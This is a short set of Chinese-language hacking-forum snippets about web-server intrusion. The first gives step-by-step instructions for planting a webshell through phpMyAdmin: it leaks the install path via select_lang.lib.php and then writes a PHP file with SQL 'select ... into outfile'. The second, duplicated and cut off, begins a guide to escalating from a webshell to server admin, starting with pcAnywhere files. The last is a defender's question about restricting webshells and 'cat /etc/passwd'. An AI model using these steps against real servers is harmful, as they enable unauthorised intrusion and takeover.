1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(''); select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php'; Drop TABLE IF EXISTS a; ----end code--- 4.如果没什么意外.对应网站得到webshell ps:执行语句后在网站跟目录生...
说到花了九牛二虎的力气获得了一个webshell, \n当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ \n嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 \n**************************************************************************** \n第一 \n如果服务器上有装了pcanywhere服务端,管理员为了管理方便 \n也给了我们方便,到系统盘的Documents and Settings/All Us \ners/Application Data/Symantec/...
说到花了九牛二虎的力气获得了一个webshell, \n当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ \n嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 \n**************************************************************************** \n第一 \n如果服务器上有装了pcanywhere服务端,管理员为了管理方便 \n也给了我们方便,到系统盘的Documents and Settings/All Us \ners/Application Data/Symantec/...
apache虚拟主机做了目录锁定,对于webshell部分该如何处理呢?禁止cat /etc/passwd 禁止普通用户执行某些命令。?望路过的各位给点意见。系统上对虚拟主机用户开了ssh。 [ 本帖最后由 liang3391 于 2009-6-2 17:53 编辑 ]